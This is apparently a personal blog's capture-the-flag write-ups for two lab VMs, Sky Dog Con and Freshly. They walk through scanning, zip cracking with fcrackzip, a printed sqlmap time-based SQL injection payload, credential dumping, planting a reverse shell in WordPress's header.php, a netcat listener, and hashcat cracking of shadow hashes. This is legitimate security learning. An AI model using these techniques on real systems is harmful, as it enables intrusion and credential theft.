The CTF is a virtual machine and works best in Virtual Box. This OVA was created using Virtual Box 4.3.32. Download the OVA file open up Virtual Box and then select File –> Import Appliance. Choose the OVA file from where you downloaded it. After importing the OVA file above it is best to disable the USB 2.0 setting before booting up the VM. The networking is setup for a NAT Network but you can change this before booting up depending on your networking setup. If you have any questions please send me a message on Twitter @jamesbower and I’ll be happy to help.

Goal of Sky Dog Con CTF

The purpose of this CTF is to find all six flags hidden throughout the server by hacking network and system services. This can be achieved without hacking the VM file itself.


The six flags are in the form of flag{MD5 Hash} such as flag{1a79a4d60de6718e8e5b326e338ae533

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)
Flag #2 When do Androids Learn to Walk?
Flag #3 Who Can You Trust?
Flag #4 Who Doesn’t Love a Good Cocktail Party?
Flag #5 Another Day at the Office
Flag #6 Little Black Box

First flag

Let’s search the network and scan the machine.

$ nmap -v                                                                                                [19:03:49]

Nmap scan report for
Host is up (0.0053s latency).
Not shown: 998 closed ports
22/tcp open  ssh
80/tcp open  http

$ nmap -A -T4 -v -p-                                                                                      [19:06:08]

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 c8:f7:5b:33:8a:5a:0c:03:bb:6b:af:2d:a9:70:d3:01 (DSA)
|   2048 01:9f:dd:98:ba:be:de:22:4a:48:4b:be:8d:1a:47:f4 (RSA)
|_  256 f8:a9:65:a5:7c:50:1d:fd:71:57:92:38:8b:ee:8c:0a (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 252 disallowed entries (15 shown)
| /search /sdch /groups /catalogs /catalogues /news /nwshp
| /setnewsprefs? /index.html? /? /?hl=*& /?hl=*&*&gws_rd=ssl
|_/addurl/image? /mail/ /pagead/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Okay, so we got ssh and port 80. Nmap also reveled that there’s a lot of action in robots.

But first I want to check out port 80.
On the first page there is a image. I remember the name of the first flag: “Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)”. Okay, so I download the image and check it out in exiftool.

wget http://skydog.dev/SkyDogCon_CTF.jpg

exiftool SkyDogCon_CTF.jpg

And BAM first flag. Found in the comment.

XP Comment                      : flag{abc40a2d4e023b42bd1ff04891549ae2}

This is when I started getting cocky. If it is this easy, it’s gonna be a breeze. Shame on me.

Now I check out the robots.txt file. And BOOM another flag.

# Congrats Mr. Bishop, your getting good - flag{cd4f10fcba234f0e8b2f60a490c306e6}

So in the robots file there was a lot of entries.

Many of them looked like this:

For example stuff like this
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$

I was sure that this was meant for some sql-injections. So I fired up sqlmapping, but nothing.

So I figured that I would see which of all the pages worked, because most of them 404ed. So in order to do that in a efficient way (and inefficient, since nikto already told me which pages responded with 200) I figured that it would be fun to do it with bash.

There are probably a million ways to write this code in a better way. But it worked for me.

First I used cut to cut out all the urls and store them in a file I called robbo.

cut -d/ -f2-5 robots.txt > robbo 

Then I wrote and ran this little script, which outputs the headers of the requests into the file output.


while read p; do
  #echo $p
  echo http://skydog.dev/"$p" >> output
  curl --head http://skydog.dev/"$p" >> output
done <robbo

Then I ran grep on that file to show me all the 200s.

grep 200 -A 3 -B 3 output

So yeah, not very efficient. But it led me to this url: http://skydog.dev/Setec/
But that was not really thanks to my crappy script. I had found it when I used the spider in ZAP as well. Anyways, that page led me to this: http://skydog.dev/Setec/Astronomy/ where I found the zipfile Whistler.zip.

I downloaded it and tried to open it. But it required a password. So I started googeling and found fcrackzip. And I started playing around with it. But in the end I ran the wrong command

$ fcrackzip -D -p rockyou.txt Whistler.zip

possible pw found: yourmother ()
possible pw found: jinglebells ()
possible pw found: 200595 ()
possible pw found: spellman ()
possible pw found: jenny86 ()
possible pw found: julie10 ()
possible pw found: nascar7 ()
possible pw found: millie25 ()
possible pw found: hackett1 ()
possible pw found: chrebet ()

It just returned tens of possible passwords.

I should have run it like this:

fcrackzip -D -v -u -p rockyou.txt Whistler.zip

found file 'flag.txt', (size cp/uc     50/    38, flags 9, chk 874a)
found file 'QuesttoFindCosmo.txt', (size cp/uc     72/    61, flags 9, chk 83b5)

PASSWORD FOUND!!!!: pw == yourmother

Yeah I was stuck here and though that there was something wrong with the program or something. So I cheated a bit and learned the correct way to use fcrackzip.

I got the flag: flag{1871a3c1da602bf471d3d76cc60cdb9b}% and a clue for the next flag:
“Time to break out those binoculars and start doing some OSINT% ”

So I started googeling about OSINT.
Osint stand for Open Source Intelligence. Something I didn’t know of before reading about it. After reading about it on wikipedia I gather that it doesn’t concern what programmers know of open source. It means more like public. Like public information gathering. It comes from the intelligence community.

Here I got really stuck again. And so I cheated. Again. Sorry.
I read in another walkthrough that he had taken out words from the movie sneakers imdb and ran it through dirbuster.

So I did that as well.

I took the movie script and downloaded it. Then I wrote the following bash-script:


for word in $(<sound.txt)
    echo "$word" >> sneakersWord2.txt

It takes sound.txt as input and lines up each word in the file sneakers.txt. Which I then used in ZAP.

So I found the path:


In /PlayTronics I got the flag:
And the next clue. http://skydog.dev/PlayTronics/companytraffic.pcap
A package capture of network traffic. So I ran:

tcpick -C -yP -r companytraffic.pcap > companytraffic.txt                                                             

And started poking around in it with grep. But yeah. I didn’t really get anywhere with it. This is where I just gave up.

If you want to find the rest of the flags check out g0blins great write-up if you haven’t already.


I really made a lot of mistakes on this one, and some stuff was just over my head. Like somehow remaking the sound-clip from the pcap-file. That would have been cool to do.
I would have easily gotten the zip-file if I just had learned the tool a bit better.
I should also have read the instructions better! If I had done that I would have figured out that I of course should have tried to crack the MD5 hashes.

I got to play around with some more unix commands like cut, and writing a bit in bash which is always useful. I also got to try out fcrackzip, although I doubt it will ever be useful. It seems like a really old technology.

So all in all a fun CTF and I learned some more. Which in the end is the most important thing.

Walkthrough Freshly

I did another vulnerable VM. This one is called Freshly and can be found here. It is also made by tophatsec, so thanks tophatsec for another great VM. Let’s get started.

First let’s find the machine.


Great, now that we got the ip, let’s scan it.

nmap -A -T4 -p-                        [12:17:27]

Starting Nmap 7.00 ( https://nmap.org ) at 2016-04-24 12:18 CLST
Nmap scan report for
Host is up (0.00058s latency).
Not shown: 65532 closed ports
80/tcp   open  http     Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp  open  ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-02-17T03:30:05
|_Not valid after:  2025-02-14T03:30:05
8080/tcp open  http     Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.45 seconds

Okay, so we have a port 80, and SSL-port 443, and port 8080. All web.
On port 80 there is just a star-wars gif. I download it and check it out if exiftool just in case. But nothing of interest.

I fire up ZAP and start doing a Force Browse (DirBusting).
Meanwhile I check out port 8080 and port 443. Both of them seem to lead to a wordpress-installation. I snoop around and find that there is a user named admin (the default user in wordpress). I try to login with admin/admin in /wp-admin but no result. I also try a dictionary-attack but without any luck. But I am not blocked out, so that means there are no plugins with fail2ban -features.

I try some sqlinjections in the store but without success.

So I go back to ZAP to see what it has found. And I can see that it has found a page called /login.php and phpmyadmin. So I head over to login.php and find a login. I use sqlmap to see if there are any vulnerabilities.

So I make a request and the intercept it in burp suite, and copypaste the request to a file I call request.txt. “user” is the parameter that I am testing for injections.

./sqlmap.py -r request.txt -p user

Okay, so sqlmap found a time-based blind.

Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: user=' AND (SELECT * FROM (SELECT(SLEEP(5)))RRpU) AND 'wUfW'='wUfW&password=&s=Submit

I had never successfully used sqlmap before, so this was a great learning experience. So after finding out that there is a vulnerability I run the following command to get the databases. It really took a long time because it was a time-based attack.

./sqlmap.py -r request.txt -p user --dbs 


available databases [7]:
[*] information_schema
[*] login
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] users
[*] wordpress8080

Then I wanted the tables and the content, so I ran:

./sqlmap.py -r request.txt -p user --tables -D wordpress8080

Database: wordpress8080
[1 table]
| users |
./sqlmap.py -r request.txt -p user --dump -D wordpress8080 -T users                                  [18:45:53]
Database: wordpress8080
Table: users
[1 entry]
| username | password            |
| admin    | SuperSecretPassword |

So yeah, not so secret password. I used it to login to wordpress.
This guide was quite useful to get the hang of sqlmap.

So, admin on a CMS usually means shell. So I went to appearance/editor and then I just copy-pasted my reverse shell into header.php. Probably not the most silent way, but it is easy to remove the code after it has been executed.
Then I fired up netcat. With:

nc -v -l 1234

-v stands for verbose. -l for listening. And 1234 is the port. The -p flag is not really needed to define the port.

Make sure that your firewall is open.

sudo ufw allow 1234

So, now I got a shell with the user daemon

uid=1(daemon) gid=1(daemon) groups=1(daemon)

I create a file in /tmp called linEnum.sh where I copypaste the linEnum-file. Then:

chmod +x linEnum.sh

To enumerate important and interesting files. It outputs a lot of stuff, among others this:


And the following in /etc/shadow


There is also a message in the shadow-file:

I thought I had to reach root, so I didn’t really think of this as the flag. So I copied the hashes and started running hashcat on them, which was fun as it was the first time. So I ran it an all the three hashes, with the following command.

./hashcat-cli64.bin -m 1800 -a 0 -o found.txt --remove candycane.hash ~/sectools/SecLists/Passwords/10_million_password_list_top_100000.txt

I only found the password for candycane which was “password”. I didn’t manage to crack the other users.

Now I wanted to su up for candycane but it didn’t work since I didn’t have a tty-shell. And

import pty; pty.spawn('/bin/bash')

this didn’t work. But I found a workaround.

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py
ptyhon shell.py

So this gave me a tty-shell and I could run su candycane.

So, here I got stuck a while and started looking back in my notes to see if I had missed something. So I took out the content from the databse login

Database: login
Table: users
[2 entries]
| password | user_name |
| password | candyshop |
| PopRocks | Sir       |

And I tried these passwords on user and root. But it didn’t work. After many other tries enumerating the system I gave up. And on some other walkthroughs I found that the password for user (which was a sudo-user) and root was SuperSecretPassword. So that was a little bit annoying that I never tried that. And I also found out that it was the same password for the mysql-root user. Which could be found in the login.php-file. So that was a little bit stupid that I never checked that.


All in all it was a great VM. I got to learn tools like hashcat and sqlmap, which I am sure will come in handy on other VMs. I also learned about wpscan while reading other walkthroughs. I was surprised that SuperSecretPassword was not found in my password-dictionaries that I tried.

Other things that I missed was playing around with phpmyadmin. I read in some other walkthroughs that you could figure out the DBMS from it. That would have been good.

But at least I got the flags.